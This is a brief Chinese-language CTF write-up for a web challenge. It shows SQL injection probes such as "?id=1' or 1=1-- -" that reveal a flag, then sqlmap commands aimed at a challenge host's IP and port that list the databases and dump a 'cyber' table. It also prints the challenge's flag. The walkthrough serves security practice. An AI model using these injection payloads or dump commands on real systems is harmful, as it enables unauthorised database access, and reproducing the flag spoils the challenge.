目录
题目场景

尝试SQL注入
?id=1' and 1=1-- -
?id=1' and 1=2-- -
?id=1' or 1=2-- -
都均无回显
?id=1' or 1=1-- -

回显出flag
Please enter ID,and Try to bypass
nice : congratulations
Flag Is : cyberpeace{76d13a6f794e1946a69a955eeb3d688d}
尝试sqlmap注入
sqlmap下载地址:http://sqlmap.org
python sqlmap.py -u "http://61.147.171.105:56192/index.php?id=1" -dbs

查看cyber表中数据
python sqlmap.py -u "http://61.147.171.105:56192/index.php?id=1" -T cyber --dump

找到flag
cyberpeace{76d13a6f794e1946a69a955eeb3d688d}